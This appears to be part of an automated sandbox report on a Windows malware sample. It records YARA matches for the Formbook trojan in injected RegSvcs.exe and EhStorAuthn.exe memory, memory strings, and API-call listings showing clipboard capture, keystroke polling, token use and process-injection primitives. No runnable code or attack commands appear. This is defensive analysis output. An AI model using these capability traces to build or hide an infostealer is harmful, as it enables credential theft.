            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/domains/results
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/email?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/privacy?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/renew?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tools?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/tos?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.hover.com/transfer_in?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.instagram.com/hover_domains
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DDF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00DDF45C
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DDF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00DDF6C7
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DCA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,8_2_00DCA54A
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | Code function: 8_2_00DF9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_00DF9ED5

            E-Banking Fraud

            Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042C353 NtClose,15_2_0042C353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422B60 NtClose,LdrInitializeThunk,15_2_01422B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_01422DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_01422C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014235C0 NtCreateMutant,LdrInitializeThunk,15_2_014235C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01424340 NtSetContextThread,15_2_01424340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01424650 NtSuspendThread,15_2_01424650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422BE0 NtQueryValueKey,15_2_01422BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422BF0 NtAllocateVirtualMemory,15_2_01422BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422B80 NtQueryInformationFile,15_2_01422B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422BA0 NtEnumerateValueKey,15_2_01422BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422AD0 NtReadFile,15_2_01422AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422AF0 NtWriteFile,15_2_01422AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422AB0 NtWaitForSingleObject,15_2_01422AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422D00 NtSetInformationFile,15_2_01422D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422D10 NtMapViewOfSection,15_2_01422D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422D30 NtUnmapViewOfSection,15_2_01422D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422DD0 NtDelayExecution,15_2_01422DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422DB0 NtEnumerateKey,15_2_01422DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422C60 NtCreateKey,15_2_01422C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422C00 NtQueryInformationProcess,15_2_01422C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422CC0 NtQueryVirtualMemory,15_2_01422CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422CF0 NtOpenProcess,15_2_01422CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422CA0 NtQueryInformationToken,15_2_01422CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422F60 NtCreateProcessEx,15_2_01422F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422F30 NtCreateSection,15_2_01422F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422FE0 NtCreateFile,15_2_01422FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422F90 NtProtectVirtualMemory,15_2_01422F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422FA0 NtQuerySection,15_2_01422FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422FB0 NtResumeThread,15_2_01422FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422E30 NtWriteVirtualMemory,15_2_01422E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422EE0 NtQueueApcThread,15_2_01422EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422E80 NtReadVirtualMemory,15_2_01422E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422EA0 NtAdjustPrivilegesToken,15_2_01422EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423010 NtOpenDirectoryObject,15_2_01423010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423090 NtSetValueKey,15_2_01423090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014239B0 NtGetContextThread,15_2_014239B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423D70 NtOpenThread,15_2_01423D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423D10 NtOpenProcessToken,15_2_01423D10
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04614650 NtSuspendThread,LdrInitializeThunk,22_2_04614650
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04614340 NtSetContextThread,LdrInitializeThunk,22_2_04614340
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612C60 NtCreateKey,LdrInitializeThunk,22_2_04612C60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612C70 NtFreeVirtualMemory,LdrInitializeThunk,22_2_04612C70
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612CA0 NtQueryInformationToken,LdrInitializeThunk,22_2_04612CA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612D30 NtUnmapViewOfSection,LdrInitializeThunk,22_2_04612D30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612D10 NtMapViewOfSection,LdrInitializeThunk,22_2_04612D10
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612DF0 NtQuerySystemInformation,LdrInitializeThunk,22_2_04612DF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612DD0 NtDelayExecution,LdrInitializeThunk,22_2_04612DD0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612EE0 NtQueueApcThread,LdrInitializeThunk,22_2_04612EE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612E80 NtReadVirtualMemory,LdrInitializeThunk,22_2_04612E80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612F30 NtCreateSection,LdrInitializeThunk,22_2_04612F30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612FE0 NtCreateFile,LdrInitializeThunk,22_2_04612FE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612FB0 NtResumeThread,LdrInitializeThunk,22_2_04612FB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612AF0 NtWriteFile,LdrInitializeThunk,22_2_04612AF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612AD0 NtReadFile,LdrInitializeThunk,22_2_04612AD0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612B60 NtClose,LdrInitializeThunk,22_2_04612B60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612BE0 NtQueryValueKey,LdrInitializeThunk,22_2_04612BE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612BF0 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_04612BF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612BA0 NtEnumerateValueKey,LdrInitializeThunk,22_2_04612BA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046135C0 NtCreateMutant,LdrInitializeThunk,22_2_046135C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046139B0 NtGetContextThread,LdrInitializeThunk,22_2_046139B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612C00 NtQueryInformationProcess,22_2_04612C00
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612CF0 NtOpenProcess,22_2_04612CF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612CC0 NtQueryVirtualMemory,22_2_04612CC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612D00 NtSetInformationFile,22_2_04612D00
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612DB0 NtEnumerateKey,22_2_04612DB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612E30 NtWriteVirtualMemory,22_2_04612E30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612EA0 NtAdjustPrivilegesToken,22_2_04612EA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612F60 NtCreateProcessEx,22_2_04612F60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612FA0 NtQuerySection,22_2_04612FA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612F90 NtProtectVirtualMemory,22_2_04612F90
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612AB0 NtWaitForSingleObject,22_2_04612AB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612B80 NtQueryInformationFile,22_2_04612B80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613010 NtOpenDirectoryObject,22_2_04613010
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613090 NtSetValueKey,22_2_04613090
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613D70 NtOpenThread,22_2_04613D70
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613D10 NtOpenProcessToken,22_2_04613D10
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308E30 NtReadFile,22_2_02308E30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308F20 NtDeleteFile,22_2_02308F20
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308FC0 NtClose,22_2_02308FC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308CC0 NtCreateFile,22_2_02308CC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02309130 NtAllocateVirtualMemory,22_2_02309130
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E69B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00E69B5C
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00DC1A91
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_00DCF122
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0460E8F022_2_0460E8F0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045C68B822_2_045C68B8
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045F696222_2_045F6962
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046AA9A622_2_046AA9A6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E29A022_2_045E29A0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045DEA8022_2_045DEA80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469AB4022_2_0469AB40
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04696BD722_2_04696BD7
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045D146022_2_045D1460
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469F43F22_2_0469F43F
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469757122_2_04697571
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046A95C322_2_046A95C3
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467D5B022_2_0467D5B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0462563022_2_04625630
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046916CC22_2_046916CC
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469F7B022_2_0469F7B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046970E922_2_046970E9
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469F0E022_2_0469F0E0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E70C022_2_045E70C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0468F0CC22_2_0468F0CC
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046AB16B22_2_046AB16B
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0461516C22_2_0461516C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045CF17222_2_045CF172
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045EB1B022_2_045EB1B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046812ED22_2_046812ED
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FB2C022_2_045FB2C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E52A022_2_045E52A0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045CD34C22_2_045CD34C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469132D22_2_0469132D
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0462739A22_2_0462739A
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04659C3222_2_04659C32
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FCF222_2_0469FCF2
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04697D7322_2_04697D73
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E3D4022_2_045E3D40
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04691D5A22_2_04691D5A
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FFDC022_2_045FFDC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E9EB022_2_045E9EB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FF0922_2_0469FF09
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045A3FD222_2_045A3FD2
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045A3FD522_2_045A3FD5
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E1F9222_2_045E1F92
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FFB122_2_0469FFB1
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0464D80022_2_0464D800
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E38E022_2_045E38E0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045E995022_2_045E9950
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FB95022_2_045FB950
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467591022_2_04675910
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04653A6C22_2_04653A6C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FA4922_2_0469FA49
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04697A4622_2_04697A46
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0468DAC622_2_0468DAC6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04625AA022_2_04625AA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0467DAAC22_2_0467DAAC
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04681AA322_2_04681AA3
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0469FB7622_2_0469FB76
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04655BF022_2_04655BF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0461DBF922_2_0461DBF9
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_045FFB8022_2_045FFB80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F192022_2_022F1920
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022ECA6022_2_022ECA60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EAAE022_2_022EAAE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EAAD622_2_022EAAD6
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EC83822_2_022EC838
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022EC84022_2_022EC840
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F4FD022_2_022F4FD0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F31AD22_2_022F31AD
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022F31B022_2_022F31B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0230B60022_2_0230B600
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433E4D322_2_0433E4D3
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433E3B822_2_0433E3B8
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433E86C22_2_0433E86C
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_0433D8D822_2_0433D8D8
